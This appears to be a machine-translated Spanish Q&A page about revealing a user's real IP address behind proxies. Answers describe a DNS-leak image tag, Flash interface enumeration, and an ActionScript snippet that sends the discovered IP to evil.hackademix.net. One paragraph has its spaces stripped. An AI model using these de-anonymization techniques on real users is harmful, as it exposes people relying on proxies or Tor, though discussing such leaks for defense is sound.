Revele la IP verdadera de un usuario

5

¿Existe alguna forma de método de práctica recomendada (y preferiblemente documentada) de revelar la IP real de un usuario mediante una conexión HTTP (S)?

Es decir: para poder descubrir la verdadera IP de los proxy transparentes y anónimos siempre que sea posible.

    
pregunta Kyle Rozendo 27.03.2012 - 09:10
fuente

3 respuestas

12

Si la conexión utiliza proxies que se implementan correctamente, descubrir la ip a través de http o tcp puede ser difícil. Puede que tenga un poco de suerte en acercarse a la ip mediante DNS. para Si genera la página dinámicamente para que contenga una imagen ubicada en un dominio que controla, por ejemplo.

<img src="http://123123.deanonymize.mydomain.com"/>

elnavegadorrealizaráunabúsquedaen123123.deanonymize.mydomain.com.EstoresultaráenunaconsultadeDNSrecursivaqueeventualmentealcanzarásudnsparamydomain.com.Laconsultaseoriginaráapartirdecualquierdnsqueestéutilizandolavíctima,normalmenteelISP.Porlotanto,aunquenoledarálaIPexacta,puedeapuntarleenunadireccióngeneral.

AFAIK,estemétodofuncionainclusosilavíctimausaTORenmodovainilla,vea enlace para más información.

Otra forma puede ser usar un applet de java para averiguar la IP en el lado del cliente, pero no estoy al día sobre qué límites existen para eso en la actualidad.

    
respondido por el mhswende 27.03.2012 - 11:31
fuente
3

Hay muchas maneras de hacerlo. Aquí hay algunos métodos más:

  1. Interfaces de la red de sondeo (Flash, puede obtener información local )

    import flash.net.NetworkInfo;
    
    public function findInterface():void
    {
        var results:Vector.<NetworkInterface> =
           NetworkInfo.networkInfo.findInterfaces();
    
        for (var i:int=0; i<results.length; i++)
        {
            var output = output
            + "Name: " + results[i].name + "\n"
            + "DisplayName: " + results[i].displayName + "\n"
            + "MTU: " + results[i].mtu + "\n"
            + "HardwareAddr: " + results[i].hardwareAddress + "\n"
            + "Active: "  + results[i].active + "\n";
    
    
            for (var j:int=0; j<results[i].addresses.length; j++)
            {
               output = output
               + "Addr: " + results[i].addresses[j].address + "\n"
               + "Broadcast: " + results[i].addresses[j].broadcast + "\n"
               + "PrefixLength: " + results[i].addresses[j].prefixLength + "\n"
               + "IPVersion: " + results[i].addresses[j].ipVersion + "\n";
            }
    
            output = output + "\n";
        }
    }
    
  2. Envíe un "ping" XML (Flash, solo afecta a los navegadores definidos proxies)

    var socket = new XMLSocket();
    socket.onConnect = function(success) {
        socket.onXML = function(doc) {
            getURL("http://evil.hackademix.net/proxy_bypass?ip=" + 
                doc.firstChild.firstChild.nodeValue);
            socket.close();
        };
        socket.send(new XML());
    };
    socket.connect("evil.hackademix.net", 9999);    
    
  3. Tenga en cuenta que toda la información de su hardware puede ser revelada por flash. (Gracias, TildalWave)

  4. Explotación de complementos del navegador . Tenga en cuenta que es probable que este ataque no le afecte si está usando una VPN, a menos que el complemento también encuentre una manera de acceder a la información local de alguna manera. Esto se debe principalmente a que algunos navegadores no aplicarán el proxy. Configuraciones utilizadas en el navegador. La solución es usar una VPN que imponga la conexión a través de su interfaz conectada. Sin embargo, si tu complemento puede acceder al contenido local (lectura / escritura / ejecución), todas las apuestas están desactivadas.

También hay una forma de hacerlo en Java. Esencialmente, desearías desactivar Java, Flash, Plugins y Javascript, para evitar que estos métodos hagan ping.

    
respondido por el Mark Buffalo 30.11.2015 - 18:52
fuente
2

Ocultar el IP es el punto de los servidores proxy anónimos. Por lo tanto, si esa máquina está haciendo su trabajo, no debería regalarla. Aunque podría intentar ejecutar algunos javascript en el lado del cliente (no estoy seguro si esto funciona en su caso.).

Para proxies transparentes, hay alguna información en esta pregunta . Se reduce a usar el encabezado X-Forwarded-For .

    
respondido por el Legolas 27.03.2012 - 10:00
fuente

Lea otras preguntas en las etiquetas